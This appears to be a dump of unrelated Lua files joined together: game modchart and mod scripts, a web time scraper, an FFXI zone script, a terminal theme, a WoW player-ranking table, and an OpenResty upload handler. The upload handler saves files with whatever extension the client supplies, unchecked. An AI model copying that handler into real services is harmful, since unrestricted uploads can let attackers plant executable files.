setActorX(_G['defaultStrum'..i..'X'] + 5 * math.sin((currentBeat + i*50) * math.pi), i)
setActorY(_G['defaultStrum'..i..'Y'] + 25 * math.cos((currentBeat + i*0.25) * math.pi), i)
tweenPosXAngle(i, _G['defaultStrum'..i..'X'], 0, 0.6, 'setDefault')
tweenPosYAngle(i, _G['defaultStrum'..i..'Y'], 0, 0.6, 'setDefault')
end
end
if difficulty == 2000 and curStep < 4500 then
local currentBeat = (songPos / 1000)*(bpm/60)
for i=0,12 do
setActorX(_G['defaultStrum'..i..'X'] + 32 * math.sin((currentBeat + i*0)), i)
setActorY(_G['defaultStrum'..i..'Y'],i)
end
end
if difficulty == 2000 and curStep < 4500 then
local currentBeat = (songPos / 1000)*(bpm/60)
for i=6,12 do
setActorX(_G['defaultStrum'..i..'X'] + 32 * math.sin((currentBeat + i*0)), i)
setActorY(_G['defaultStrum'..i..'Y'],i)
end
end
end
-- :shadounepoto: |
txd = engineLoadTXD("jester.txd")
engineImportTXD(txd, 559)
dff = engineLoadDFF("jester.dff", 559)
engineReplaceModel(dff, 559)
|
local http = require("socket.http") -- Debian package is 'lua-socket'
function scrapeTime (pageAddress, timeZone)
local page = http.request(pageAddress)
if not page then return "Cannot connect" end
for line in page:gmatch("[^<BR>]*") do
if line:match(timeZone) then
return line:match("%d+:%d+:%d+")
end
end
end
local url = "http://tycho.usno.navy.mil/cgi-bin/timer.pl"
print(scrapeTime(url, "UTC"))
|
-----------------------------------
--
-- Zone: Windurst_Woods (241)
--
-----------------------------------
local ID = require("scripts/zones/Windurst_Woods/IDs")
require("scripts/globals/events/harvest_festivals")
require("scripts/globals/conquest")
require("scripts/globals/settings")
require("scripts/globals/chocobo")
require("scripts/globals/zone")
-----------------------------------
function onInitialize(zone)
applyHalloweenNpcCostumes(zone:getID())
tpz.chocobo.initZone(zone)
end
function onZoneIn(player,prevZone)
local cs = -1
-- SOA 1-1 Optional CS
if
ENABLE_SOA and
player:getCurrentMission(SOA) == tpz.mission.id.soa.RUMORS_FROM_THE_WEST and
player:getCharVar("SOA_1_CS3") == 0
then
cs = 839
end
-- FIRST LOGIN (START CS)
if player:getPlaytime(false) == 0 then
if OPENING_CUTSCENE_ENABLE == 1 then
cs = 367
end
player:setPos(0,0,-50,0)
player:setHomePoint()
end
-- MOG HOUSE EXIT
if player:getXPos() == 0 and player:getYPos() == 0 and player:getZPos() == 0 then
position = math.random(1,5) + 37
player:setPos(-138,-10,position,0)
if player:getMainJob() ~= player:getCharVar("PlayerMainJob") then
cs = 30004
end
player:setCharVar("PlayerMainJob",0)
end
return cs
end
function onConquestUpdate(zone, updatetype)
tpz.conq.onConquestUpdate(zone, updatetype)
end
function onRegionEnter(player,region)
end
function onEventUpdate(player,csid,option)
end
function onEventFinish(player,csid,option)
if csid == 367 then
player:messageSpecial(ID.text.ITEM_OBTAINED,536)
elseif csid == 30004 and option == 0 then
player:setHomePoint()
player:messageSpecial(ID.text.HOMEPOINT_SET)
elseif csid == 839 then
player:setCharVar("SOA_1_CS3", 1)
end
end |
---
--- Created by Seaton.
--- DateTime: 2017/11/9 0009 15:51
---
local upload = require('resty.upload')
local util = require('common.util')
local chunk_size = 4096
local form = upload:new(chunk_size)
local file
local save_path = ".//workspace/upload/"
local FileUpload = {}
--获取文件名
function FileUpload:get_filename(res)
local filename = ngx.re.match(res,'(.+)filename="(.+)"(.*)')
if filename then
return filename[2]
end
end
--获取文件扩展名
function FileUpload:getExtension(str)
return str:match(".+%.(%w+)$")
end
function FileUpload:save_file()
while true do
local typ, res, err = form:read()
if not typ then
ngx.say("{error:'error', msg:'"..tostring(err).."',imgurl:''}")
return
end
if typ == "header" then
if res[1] ~= "Content-Type" then
local file_id = util.create_uuid()
local filen_ame = self:get_filename(res[2])
local extension = self:getExtension(filen_ame)
local file_name = save_path ..file_id.."."..extension
if file_name then
file = io.open(file_name, "wb+")
if not file then
return {
code = 10021,
msg = 'failed to open file',
data= {}
}
end
end
end
elseif typ == "body" then
if file then
file:write(res)
end
elseif typ == "part_end" then
file:close()
file = nil
elseif typ == "eof" then
break
else
-- do nothing
end
end
return {
code = 0,
msg = 'success',
data= {}
}
end
return FileUpload |
object_tangible_wearables_armor_armor_clothing_nostat_base_battle = object_tangible_wearables_armor_shared_armor_clothing_nostat_base_battle:new {
}
ObjectTemplates:addTemplate(object_tangible_wearables_armor_armor_clothing_nostat_base_battle, "object/tangible/wearables/armor/armor_clothing_nostat_base_battle.iff")
|
local theme={colors={normal={blue={0.1921568627451,0.50980392156863,0.74117647058824,1},green={0.1921568627451,0.63921568627451,0.32941176470588,1},cyan={0.50196078431373,0.69411764705882,0.82745098039216,1},white={0.71764705882353,0.72156862745098,0.72549019607843,1},red={0.89019607843137,0.10196078431373,0.10980392156863,1},magenta={0.45882352941176,0.41960784313725,0.69411764705882,1},black={0.047058823529412,0.050980392156863,0.054901960784314,1},yellow={0.86274509803922,0.62745098039216,0.37647058823529,1}},primary={background={0.047058823529412,0.050980392156863,0.054901960784314,1},foreground={0.71764705882353,0.72156862745098,0.72549019607843,1}},bright={blue={0.5843137254902,0.58823529411765,0.5921568627451,1},green={0.18039215686275,0.1843137254902,0.18823529411765,1},cyan={0.69411764705882,0.34901960784314,0.15686274509804,1},white={0.98823529411765,0.9921568627451,0.99607843137255,1},red={0.90196078431373,0.33333333333333,0.050980392156863,1},magenta={0.85490196078431,0.85882352941176,0.86274509803922,1},black={0.45098039215686,0.45490196078431,0.45882352941176,1},yellow={0.31764705882353,0.32156862745098,0.32549019607843,1}},cursor={text={0.047058823529412,0.050980392156863,0.054901960784314,1},cursor={0.71764705882353,0.72156862745098,0.72549019607843,1}}}}
return theme.colors |
if(GetRealmName() == "Whitemane")then
WP_Database = {
["Punch"] = "ST:857/99%SB:894/99%SM:1033/99%",
["Wompy"] = "ST:851/99%SB:866/99%SM:1066/99%",
["Outbreak"] = "ST:902/99%SB:875/99%SM:1096/99%",
["Bigjoo"] = "ST:869/99%SB:878/99%SM:1043/99%",
["Kuzuqt"] = "ET:667/87%SB:831/99%SM:1067/99%",
["Grizzmint"] = "ST:816/99%SB:805/99%SM:1059/99%",
["Vite"] = "ST:846/99%SB:895/99%SM:1091/99%",
["Sam"] = "ST:831/99%SB:818/99%SM:1006/99%",
["Newmz"] = "ST:817/99%SB:827/99%LM:981/98%",
["Sitnbull"] = "ST:802/99%SB:829/99%SM:1069/99%",
["Shiftw"] = "LT:784/98%SB:825/99%SM:1025/99%",
["Cannie"] = "ST:804/99%SB:821/99%SM:1020/99%",
["Retriever"] = "ST:886/99%SB:868/99%SM:1007/99%",
["Everchosen"] = "ST:818/99%SB:826/99%SM:1024/99%",
["Under"] = "UT:353/48%SB:824/99%LM:940/96%",
["Jennie"] = "ST:808/99%SB:807/99%EM:904/94%",
["Zyl"] = "ST:800/99%SB:821/99%LM:978/98%",
["Amish"] = "ST:823/99%SB:828/99%SM:1022/99%",
["Ashenfury"] = "ST:830/99%SB:852/99%LM:992/98%",
["Pickupthret"] = "ST:825/99%SB:832/99%SM:1081/99%",
["Xaiful"] = "ST:855/99%SB:844/99%SM:1112/99%",
["Oldmankisser"] = "ST:834/99%SB:850/99%SM:1049/99%",
["Niklas"] = "ST:830/99%SB:816/99%SM:1022/99%",
["Camp"] = "LT:785/98%SB:852/99%SM:1032/99%",
["Suffered"] = "ST:808/99%SB:823/99%SM:1109/99%",
["Cyderxlord"] = "ST:850/99%SB:857/99%SM:1149/99%",
["Sfsh"] = "ST:809/99%SB:806/99%SM:1001/99%",
["Cleavegodx"] = "ST:796/99%SB:827/99%SM:953/99%",
["Texangnome"] = "ST:933/99%SB:858/99%SM:1059/99%",
["Gnamos"] = "ST:799/99%SB:835/99%LM:973/98%",
["Zerxx"] = "ST:791/99%SB:802/99%LM:982/98%",
["Amaso"] = "SB:879/99%SM:1015/99%",
["Claw"] = "ST:792/99%SB:825/99%LM:959/97%",
["Murim"] = "ST:813/99%SB:829/99%SM:1027/99%",
["Aerobic"] = "ST:800/99%SB:847/99%SM:1005/99%",
["Espozito"] = "ST:794/99%SB:830/99%SM:943/99%",
["Digie"] = "LT:794/98%SB:828/99%LM:939/95%",
["Büllied"] = "ST:812/99%SB:855/99%SM:982/99%",
["Dogtamer"] = "ST:852/99%SB:846/99%SM:971/99%",
["Huchanan"] = "LT:775/98%SB:777/99%SM:949/99%",
["Elite"] = "ST:770/99%SB:821/99%LM:938/95%",
["Sodanickel"] = "ST:815/99%SB:823/99%LM:959/98%",
["Ezei"] = "ST:834/99%SB:870/99%SM:1027/99%",
["Ggclarence"] = "ST:802/99%SB:837/99%SM:1008/99%",
["Laird"] = "LT:771/97%SB:811/99%EM:917/94%",
["Tongster"] = "ST:792/99%SB:819/99%LM:978/98%",
["Boomerkiller"] = "ST:830/99%SB:850/99%SM:984/99%",
["Weegee"] = "ST:823/99%SB:872/99%SM:1033/99%",
["Skozen"] = "RT:423/60%SB:817/99%SM:1021/99%",
["Isupremel"] = "LT:756/96%SB:812/99%LM:1001/98%",
["Borkborks"] = "LT:762/96%SB:798/99%SM:986/99%",
["Headcrabs"] = "ST:811/99%SB:775/99%SM:1011/99%",
["Uhhwhuut"] = "LT:775/97%SB:817/99%SM:924/99%",
["Vadim"] = "SB:806/99%LM:910/95%",
["Longlivekobe"] = "ST:807/99%SB:802/99%LM:939/96%",
["Hyx"] = "ST:798/99%SB:818/99%SM:1043/99%",
["Jnguyen"] = "LT:774/97%SB:766/99%LM:908/98%",
["Nitrox"] = "ST:826/99%SB:835/99%SM:1036/99%",
["Armbiter"] = "ST:834/99%SB:857/99%SM:1039/99%",
["Soylentgreen"] = "ST:802/99%SB:841/99%SM:1056/99%",
["Widestancer"] = "ST:814/99%SB:814/99%SM:1006/99%",
["Gnucci"] = "LT:766/97%SB:837/99%SM:1042/99%",
["Rackaribbs"] = "LT:788/98%LB:794/98%LM:986/98%",
["Sulphurous"] = "ST:832/99%SB:825/99%SM:978/99%",
["Youngliam"] = "ST:805/99%SB:819/99%SM:1009/99%",
["Titan"] = "ST:794/99%SB:812/99%LM:984/98%",
["Billzz"] = "ST:830/99%SB:831/99%SM:919/99%",
["Neilyogodx"] = "ST:879/99%SB:847/99%SM:1010/99%",
["Protstatoot"] = "LT:784/98%SB:808/99%LM:962/98%",
["Dabes"] = "LT:775/97%SB:807/99%SM:941/99%",
["Aurrelius"] = "ST:823/99%SB:839/99%SM:1072/99%",
["Gratitude"] = "ST:803/99%SB:811/99%LM:982/98%",
["Imminent"] = "ST:787/99%SB:820/99%LM:928/96%",
["Wompwomp"] = "ST:792/99%SB:846/99%SM:1011/99%",
["Pseu"] = "ST:807/99%SB:848/99%SM:1055/99%",
["Exolaris"] = "LT:770/97%SB:796/99%LM:963/97%",
["Shrevident"] = "ET:739/94%SB:796/99%LM:816/96%",
["Transwoman"] = "ST:812/99%SB:812/99%SM:962/99%",
["Doraemong"] = "ST:807/99%SB:826/99%LM:951/96%",
["Steefbeef"] = "ST:700/99%LB:794/98%EM:727/93%",
["Stano"] = "ST:816/99%SB:830/99%LM:987/98%",
["Lexikins"] = "ST:798/99%SB:801/99%LM:949/96%",
["Eliox"] = "ST:792/99%LB:793/98%LM:947/96%",
["Kill"] = "LT:790/98%SB:806/99%LM:979/97%",
["Rumegirl"] = "ST:802/99%SB:825/99%LM:956/97%",
["Bogged"] = "ST:839/99%SB:806/99%SM:1087/99%",
["Vlades"] = "ST:807/99%SB:782/99%SM:1001/99%",
["Zóff"] = "LT:773/97%SB:798/99%LM:928/96%",
["Bartolome"] = "LT:763/96%SB:795/99%LM:879/95%",
["Bodhi"] = "ST:817/99%SB:823/99%LM:986/98%",
["Wore"] = "LT:787/98%SB:810/99%LM:937/95%",
["Pookiee"] = "LT:788/98%SB:809/99%SM:1047/99%",
["Drwareg"] = "LT:761/96%LB:792/98%SM:1003/99%",
["Ralphmen"] = "ST:804/99%SB:814/99%SM:1008/99%",
["Machomanrs"] = "ST:804/99%SB:820/99%LM:939/95%",
["Furryirl"] = "LT:765/97%SB:797/99%EM:906/94%",
["Maganum"] = "ST:758/99%LB:791/98%LM:994/98%",
["Baezy"] = "LT:741/95%SB:813/99%EM:906/93%",
["Drasin"] = "LT:765/97%LB:790/98%EM:926/94%",
["Ritter"] = "LT:783/98%SB:782/99%SM:1020/99%",
["Zardude"] = "ST:973/99%SB:889/99%SM:1025/99%",
["Holyredneck"] = "ST:884/99%SB:807/99%SM:1059/99%",
["Vann"] = "ST:891/99%SB:845/99%SM:1082/99%",
["Daezuel"] = "ST:899/99%SB:844/99%SM:939/99%",
["Myangel"] = "LT:847/97%SB:809/99%SM:980/99%",
["Maeson"] = "ST:912/99%SB:825/99%SM:1002/99%",
["Belwas"] = "ST:896/99%SB:802/99%SM:1019/99%",
["Nohealforu"] = "ST:920/99%SB:829/99%LM:968/98%",
["Bartowski"] = "ST:897/99%SB:844/99%LM:970/98%",
["Insure"] = "ST:903/99%SB:852/99%SM:1088/99%",
["Phi"] = "ST:932/99%SB:817/99%SM:1001/99%",
["Diaperhelmet"] = "ST:883/99%SB:820/99%SM:1004/99%",
["Imstuff"] = "LT:865/98%SB:842/99%SM:940/99%",
["Roshi"] = "ST:974/99%SB:876/99%SM:1096/99%",
["Mootwo"] = "LT:853/97%SB:801/99%LM:956/98%",
["Alustriel"] = "LT:865/98%SB:837/99%SM:1022/99%",
["Slumpbusta"] = "ST:905/99%SB:824/99%SM:1029/99%",
["Wideloadjeje"] = "ST:939/99%SB:859/99%SM:1028/99%",
["Eielleria"] = "LT:871/98%SB:789/99%LM:959/98%",
["Akaritakai"] = "LT:575/97%LB:716/95%LM:956/98%",
["Justone"] = "LT:592/97%SB:799/99%LM:961/98%",
["Atspriest"] = "ST:882/99%SB:816/99%LM:958/98%",
["Moistotem"] = "LT:864/98%SB:813/99%SM:905/99%",
["Jamella"] = "ST:939/99%SB:823/99%LM:969/98%",
["Rpze"] = "ST:919/99%SB:877/99%SM:1012/99%",
["Theripz"] = "ST:924/99%SB:832/99%SM:1034/99%",
["Hexatonious"] = "ST:771/99%SB:810/99%LM:979/98%",
["Sephys"] = "LT:582/97%SB:771/99%LM:974/98%",
["Lolikaust"] = "ST:915/99%SB:825/99%SM:1009/99%",
["Tossme"] = "ST:880/99%SB:822/99%SM:1073/99%",
["Dreamstate"] = "LT:870/98%SB:834/99%SM:1036/99%",
["Cazzi"] = "ST:909/99%SB:815/99%SM:1029/99%",
["Rpz"] = "ST:913/99%SB:869/99%SM:988/99%",
["Slippur"] = "ST:876/99%SB:825/99%SM:994/99%",
["Kenada"] = "LT:823/96%SB:811/99%LM:859/98%",
["Bavie"] = "LT:857/98%SB:792/99%SM:1008/99%",
["Wapphle"] = "ET:674/84%LB:737/97%LM:893/96%",
["Jinrang"] = "ST:934/99%SB:806/99%SM:1036/99%",
["Beerrus"] = "LT:828/96%SB:779/99%LM:935/98%",
["Nile"] = "ET:702/88%SB:695/99%EM:904/94%",
["Sencha"] = "ST:928/99%SB:820/99%SM:1024/99%",
["Acima"] = "LT:847/97%LB:769/98%LM:943/98%",
["Loamana"] = "LT:831/96%SB:797/99%LM:964/98%",
["Poojmcnasty"] = "LT:853/98%SB:781/99%SM:1023/99%",
["Keldy"] = "LT:872/98%SB:787/99%SM:1061/99%",
["Cloudeze"] = "ST:877/99%SB:814/99%LM:866/98%",
["Sabon"] = "ST:889/99%SB:777/99%SM:1040/99%",
["Criticalfap"] = "ST:900/99%SB:821/99%SM:1009/99%",
["Azsharian"] = "ET:314/83%SB:879/99%SM:993/99%",
["Narthor"] = "ET:665/84%SB:783/99%LM:970/98%",
["Tohell"] = "LT:828/96%SB:772/99%LM:896/96%",
["Grits"] = "ST:898/99%SB:793/99%SM:1167/99%",
["Folspam"] = "ST:898/99%SB:841/99%SM:1010/99%",
["Smhh"] = "ST:937/99%SB:814/99%SM:1006/99%",
["Hergerjoyous"] = "ST:925/99%SB:812/99%LM:968/98%",
["Sachairi"] = "ST:926/99%SB:818/99%LM:978/98%",
["Odimm"] = "LT:688/98%SB:794/99%SM:1001/99%",
["Viktoriaa"] = "ST:893/99%SB:787/99%SM:980/99%",
["Iceyy"] = "ST:905/99%SB:779/99%SM:990/99%",
["Innatez"] = "ST:981/99%SB:789/99%SM:1079/99%",
["Media"] = "ST:901/99%SB:805/99%SM:980/99%",
["Nizaira"] = "LT:808/95%LB:740/97%LM:977/98%",
["Meren"] = "ST:883/99%SB:775/99%SM:971/99%",
["Qbit"] = "LT:811/95%LB:776/98%SM:1000/99%",
["Tayhoot"] = "LT:839/97%SB:682/99%LM:883/95%",
["Pelion"] = "ET:730/89%SB:803/99%LM:945/97%",
["Icemayne"] = "ST:954/99%SB:814/99%SM:1053/99%",
["Aírwave"] = "LT:868/98%SB:796/99%LM:806/97%",
["Bananaface"] = "ST:882/99%SB:805/99%SM:1007/99%",
["Tooltime"] = "ET:783/93%SB:731/99%LM:761/96%",
["Trolljinman"] = "LT:861/98%SB:778/99%SM:1117/99%",
["Asphodel"] = "ST:890/99%SB:803/99%SM:1043/99%",
["Metaljacx"] = "ST:872/99%SB:794/99%SM:985/99%",
["Djpantsparty"] = "LT:578/97%SB:788/99%LM:864/98%",
["Erthwndnfire"] = "ET:777/93%SB:820/99%SM:1021/99%",
["Doc"] = "LT:861/98%SB:811/99%SM:1097/99%",
["Nisio"] = "LT:863/98%SB:800/99%EM:850/93%",
["Valkarion"] = "ST:901/99%LB:759/98%SM:988/99%",
["Skadooche"] = "ET:381/88%LB:756/98%LM:936/97%",
["Shintakui"] = "ST:914/99%SB:824/99%SM:987/99%",
["Belgear"] = "ST:1005/99%SB:884/99%SM:1045/99%",
["Hueysnaggle"] = "LT:841/97%LB:779/98%SM:980/99%",
["Michigander"] = "ET:407/90%LB:735/96%LM:920/95%",
["Dawnswallows"] = "ET:687/85%SB:702/99%EM:862/92%",
["Shintakuix"] = "LT:640/98%SB:803/99%SM:995/99%",
["Biblow"] = "LT:793/95%SB:770/99%LM:962/98%",
["Meowyou"] = "ST:894/99%SB:779/99%LM:954/98%",
["Yarp"] = "ST:882/99%SB:816/99%LM:972/98%",
["Timl"] = "LT:497/95%LB:755/98%SM:1032/99%",
["Letslovelain"] = "ST:828/99%SB:850/99%SM:1025/99%",
["Erikku"] = "ST:890/99%SB:834/99%SM:1035/99%",
["Boki"] = "LT:666/98%SB:794/99%SM:981/99%",
["Parawon"] = "ST:711/99%SB:770/99%SM:967/99%",
["Maoainai"] = "ST:891/99%SB:807/99%LM:938/98%",
["Sceade"] = "ST:910/99%SB:742/99%LM:962/98%",
["Kayberz"] = "ST:732/99%SB:800/99%LM:957/97%",
["Shinramyun"] = "ST:897/99%SB:753/99%LM:965/98%",
["Presty"] = "ET:266/75%SB:800/99%SM:995/99%",
["Jasmine"] = "LT:864/98%SB:821/99%SM:1010/99%",
["Receipt"] = "ST:878/99%SB:797/99%SM:1002/99%",
["Rain"] = "ST:867/99%SB:819/99%EM:915/94%",
["Insec"] = "ST:854/99%SB:878/99%SM:1109/99%",
["Notfarmers"] = "ST:810/99%LB:789/98%LM:979/98%",
["Amadaeus"] = "ST:822/99%SB:811/99%SM:1042/99%",
["Mineva"] = "ST:845/99%SB:862/99%SM:1039/99%",
["Diggle"] = "ST:833/99%SB:808/99%SM:998/99%",
["Cahira"] = "LT:790/98%SB:807/99%SM:1005/99%",
["Rynse"] = "ST:805/99%SB:799/99%LM:826/97%",
["Frav"] = "ST:798/99%SB:832/99%LM:971/98%",
["Shendelzare"] = "ST:821/99%SB:841/99%SM:1000/99%",
["Ahronar"] = "LT:785/98%LB:780/98%LM:858/97%",
["Terrordactyl"] = "ST:794/99%LB:791/98%LM:937/95%",
["Stussy"] = "ST:849/99%SB:828/99%SM:1007/99%",
["Stukaa"] = "ST:867/99%SB:817/99%EM:901/92%",
["Dayvanie"] = "ST:892/99%SB:841/99%EM:876/90%",
["Jab"] = "LT:785/98%SB:800/99%LM:969/98%",
["Recktangle"] = "ST:817/99%LB:780/97%EM:926/94%",
["Zax"] = "ST:797/99%SB:823/99%LM:984/98%",
["Dillmcpickle"] = "ST:798/99%SB:798/99%LM:958/97%",
["Peanutzz"] = "LT:787/98%SB:749/99%SM:919/99%",
["Texanknight"] = "ST:814/99%SB:819/99%SM:1012/99%",
["Insayn"] = "ST:810/99%SB:827/99%SM:1002/99%",
["Liinx"] = "ST:804/99%LB:777/97%EM:918/94%",
["Vytal"] = "ST:864/99%SB:843/99%SM:1095/99%",
["Warrian"] = "ST:841/99%SB:821/99%SM:996/99%",
["Edrius"] = "ST:800/99%SB:818/99%EM:908/94%",
["Ok"] = "ST:817/99%SB:771/99%SM:1034/99%",
["Perkys"] = "LT:783/98%SB:815/99%LM:965/97%",
["Uglybacon"] = "LT:791/98%LB:794/98%SM:1065/99%",
["Waltentons"] = "ST:829/99%LB:795/98%EM:943/94%",
["Crowmo"] = "ST:825/99%LB:787/98%UM:77/26%",
["Wesmart"] = "ST:802/99%LB:773/97%EM:901/94%",
["Vinsanity"] = "ST:773/99%SB:826/99%SM:999/99%",
["Ryuken"] = "ST:819/99%LB:770/96%EM:932/93%",
["Joomanji"] = "ST:818/99%SB:803/99%LM:936/95%",
["Powerbottoms"] = "LT:781/98%SB:807/99%LM:1002/98%",
["Suavo"] = "LT:786/98%LB:729/98%EM:760/82%",
["Zathdogx"] = "ST:818/99%SB:795/99%SM:997/99%",
["Cody"] = "ST:893/99%SB:865/99%SM:1129/99%",
["Krave"] = "ST:795/99%SB:749/99%LM:963/97%",
["Joocetank"] = "ST:793/99%SB:774/99%LM:949/96%",
["Beansandrice"] = "ST:809/99%SB:795/99%SM:1027/99%",
["Devaza"] = "LT:790/98%LB:789/98%SM:998/99%",
["Slarmeaux"] = "ST:841/99%SB:829/99%LM:992/98%",
["Spaztar"] = "LT:758/96%LB:773/97%LM:837/97%",
["Viciousmixr"] = "LT:649/98%LB:760/95%LM:958/97%",
["Hellucard"] = "ST:801/99%SB:757/99%LM:980/98%",
["Everfury"] = "ST:793/99%SB:805/99%LM:956/97%",
["Ukim"] = "ST:798/99%SB:810/99%SM:1008/99%",
["Squanchers"] = "ST:704/99%SB:772/99%LM:981/98%",
["Sweetdreams"] = "LT:785/98%LB:787/98%EM:913/94%",
["Drakax"] = "LT:787/98%SB:834/99%SM:1018/99%",
["Pathologic"] = "ST:740/99%SB:751/99%SM:1033/99%",
["Bakio"] = "ST:779/99%SB:840/99%LM:962/97%",
["Damouse"] = "LT:786/98%LB:784/98%SM:986/99%",
["Veir"] = "LT:782/98%SB:807/99%LM:956/97%",
["Whoisthis"] = "ST:836/99%SB:855/99%SM:1022/99%",
["Beings"] = "ST:967/99%SB:821/99%SM:1051/99%",
["Allstarplaya"] = "ST:1002/99%SB:835/99%SM:983/99%",
["Dìon"] = "ST:919/99%SB:815/99%SM:1015/99%",
["Consequences"] = "ST:943/99%LB:755/97%EM:709/78%",
["Chromium"] = "ST:752/99%LB:748/97%SM:994/99%",
["Volo"] = "ST:902/99%SB:831/99%SM:1036/99%",
["Newduelist"] = "ST:939/99%LB:677/98%SM:996/99%",
["Sorya"] = "ST:914/99%SB:785/99%LM:976/98%",
["Xodious"] = "ET:725/91%LB:755/98%SM:978/99%",
["Pvheal"] = "ST:812/99%SB:770/99%LM:881/95%",
["Jadiekhano"] = "LT:856/98%LB:713/95%EM:876/93%",
["Lagotharen"] = "ST:881/99%LB:753/98%SM:933/99%",
["Inbeing"] = "ST:890/99%LB:759/98%LM:958/98%",
["Japa"] = "ST:901/99%SB:817/99%SM:1013/99%",
["Niubee"] = "ST:937/99%SB:808/99%SM:1031/99%",
["Camstrong"] = "LT:834/97%LB:769/98%UM:142/38%",
["Ocean"] = "ST:879/99%SB:788/99%SM:967/99%",
["Allstar"] = "ST:895/99%SB:817/99%SM:996/99%",
["Shiori"] = "ST:788/99%LB:743/97%LM:971/98%",
["Timteebow"] = "ST:892/99%SB:791/99%LM:967/98%",
["Oldxueqiu"] = "LT:871/98%LB:743/97%LM:938/97%",
["Clayre"] = "ST:906/99%SB:845/99%SM:1052/99%",
["Umbrajin"] = "LT:867/98%EB:646/90%LM:874/95%",
["Imaret"] = "ST:898/99%SB:796/99%LM:974/98%",
["Aristhottle"] = "LT:840/97%EB:618/87%EM:842/92%",
["Schlimbot"] = "LT:842/97%LB:712/96%LM:962/98%",
["Marna"] = "LT:849/97%LB:674/98%LM:784/97%",
["Floundurs"] = "ST:726/99%LB:665/98%LM:940/97%",
["Anna"] = "ST:885/99%LB:768/98%SM:1011/99%",
["Bigbrainer"] = "ST:890/99%SB:718/99%LM:943/96%",
["Panzerpope"] = "ST:954/99%SB:861/99%SM:1082/99%",
["Forgivenx"] = "ST:907/99%SB:789/99%LM:902/96%",
["Cblunt"] = "ST:900/99%LB:731/97%LM:928/96%",
["Shánn"] = "ST:870/99%SB:736/99%SM:981/99%",
["Drplants"] = "LT:866/98%SB:881/99%SM:989/99%",
["Namshur"] = "LT:850/98%SB:757/99%SM:976/99%",
["Bigsax"] = "LT:870/98%SB:891/99%SM:1086/99%",
["Feks"] = "ST:889/99%LB:738/96%SM:1013/99%",
["Phavikoos"] = "LT:854/98%SB:802/99%SM:992/99%",
["Callixtus"] = "LT:874/98%SB:818/99%LM:956/98%",
["Zinroth"] = "ST:920/99%SB:784/99%SM:1012/99%",
["Moice"] = "LT:850/98%LB:767/98%SM:1003/99%",
["Espy"] = "LT:825/96%SB:807/99%SM:1017/99%",
["Tsukimiko"] = "ST:888/99%SB:784/99%SM:1028/99%",
["Luckyproc"] = "ST:879/99%LB:742/96%LM:942/96%",
["Shefood"] = "LT:854/98%LB:712/96%LM:928/96%",
["Goldhealer"] = "LT:853/98%SB:807/99%SM:1003/99%",
["Wrathstruck"] = "ST:898/99%SB:817/99%SM:1012/99%",
["Dowhat"] = "LT:865/98%LB:748/96%EM:904/94%",
["Sambulance"] = "LT:870/98%EB:690/94%LM:974/98%",
["Darknyght"] = "ST:910/99%SB:776/99%SM:1046/99%",
["Tamackha"] = "LT:849/98%SB:784/99%SM:978/99%",
["Epicheal"] = "ST:913/99%SB:750/99%SM:901/99%",
["Sherry"] = "LT:854/98%SB:702/99%LM:935/97%",
["Avadonn"] = "LT:854/98%LB:739/97%",
["Thedarkdwarf"] = "LT:852/98%LB:705/95%EM:860/92%",
["Rxn"] = "ST:929/99%SB:815/99%LM:951/97%",
["Whiteleaf"] = "LT:873/98%LB:755/98%SM:987/99%",
["Grouchymeow"] = "LT:837/97%LB:761/98%EM:800/89%",
["Frustrated"] = "ET:700/93%LB:782/98%LM:924/97%",
["Elio"] = "ST:863/99%SB:940/99%SM:1162/99%",
["Biebibi"] = "LT:749/95%SB:802/99%SM:1042/99%",
["Sparqi"] = "ST:709/99%SB:799/99%LM:966/97%",
["Sopp"] = "ST:687/99%SB:804/99%SM:1008/99%",
["Thoras"] = "ST:815/99%LB:781/98%SM:962/99%",
["Washed"] = "LT:765/97%LB:792/98%LM:981/98%",
["Slickbacc"] = "ST:679/99%LB:778/97%LM:950/96%",
["Sevem"] = "ST:784/99%SB:833/99%SM:1087/99%",
["Tigglesworth"] = "LT:647/98%SB:809/99%SM:998/99%",
["Gg"] = "ST:811/99%SB:794/99%SM:1039/99%",
["Apho"] = "ST:827/99%SB:836/99%SM:1097/99%",
["Furytime"] = "LT:790/98%LB:792/98%SM:1010/99%",
["Corpserun"] = "LT:773/97%SB:800/99%EM:902/92%",
["Sakurai"] = "LT:765/96%SB:806/99%LM:962/97%",
["Kooze"] = "ST:805/99%SB:832/99%SM:1057/99%",
["Interdiction"] = "LT:786/98%SB:818/99%EM:911/93%",
["Chumbee"] = "LT:756/96%LB:793/98%EM:839/89%",
["Faineant"] = "LT:784/98%SB:819/99%SM:1055/99%",
["Jamallamar"] = "LT:774/97%LB:792/98%LM:895/98%",
["Donkeylkong"] = "LB:780/98%LM:964/97%",
["Hexagramx"] = "ST:803/99%SB:792/99%SM:1008/99%",
["Cammycakes"] = "LT:772/97%SB:817/99%LM:965/97%",
["Achimedes"] = "LT:773/97%SB:815/99%SM:1022/99%",
["Saelaren"] = "ST:797/99%SB:806/99%SM:944/99%",
["Elgrande"] = "LT:781/98%SB:808/99%LM:939/95%",
["Kirbie"] = "ET:730/93%LB:772/97%LM:971/98%",
["Hyenuh"] = "SB:820/99%LM:969/97%",
["Thedan"] = "LT:773/97%SB:844/99%SM:1087/99%",
["Cupnoodoh"] = "ST:709/99%SB:837/99%LM:950/97%",
["Papertank"] = "ST:667/99%SB:808/99%SM:986/99%",
["Brannon"] = "ST:822/99%SB:843/99%SM:1032/99%",
["Sapper"] = "RT:546/73%SB:798/99%LM:956/96%",
["Damascus"] = "ST:863/99%SB:883/99%SM:1119/99%",
["Deathknights"] = "LT:765/97%SB:803/99%SM:943/99%",
["Boofergoofer"] = "LT:787/98%SB:797/99%SM:1003/99%",
["Krumpz"] = "LT:758/96%SB:802/99%SM:1021/99%",
["Turbogender"] = "ET:623/84%LB:790/98%EM:894/92%",
["Hoodyw"] = "LT:780/98%LB:789/98%LM:958/97%",
["Vandoom"] = "LT:778/98%SB:809/99%SM:1042/99%",
["Snkysnky"] = "LT:767/97%SB:796/99%LM:972/98%",
["Aped"] = "ET:686/89%SB:809/99%LM:821/96%",
["Daftpunk"] = "ST:795/99%SB:815/99%SM:998/99%",
["Tekneek"] = "ST:814/99%LB:777/97%LM:914/97%",
["Raterst"] = "ST:785/99%SB:800/99%LM:966/97%",
["Sunnymoo"] = "LT:752/96%SB:794/99%EM:900/94%",
["Sudkat"] = "ST:821/99%SB:808/99%SM:1041/99%",
["Omar"] = "LT:777/97%SB:807/99%LM:984/98%",
["Fnlizardlord"] = "ST:655/99%LB:787/98%LM:911/95%",
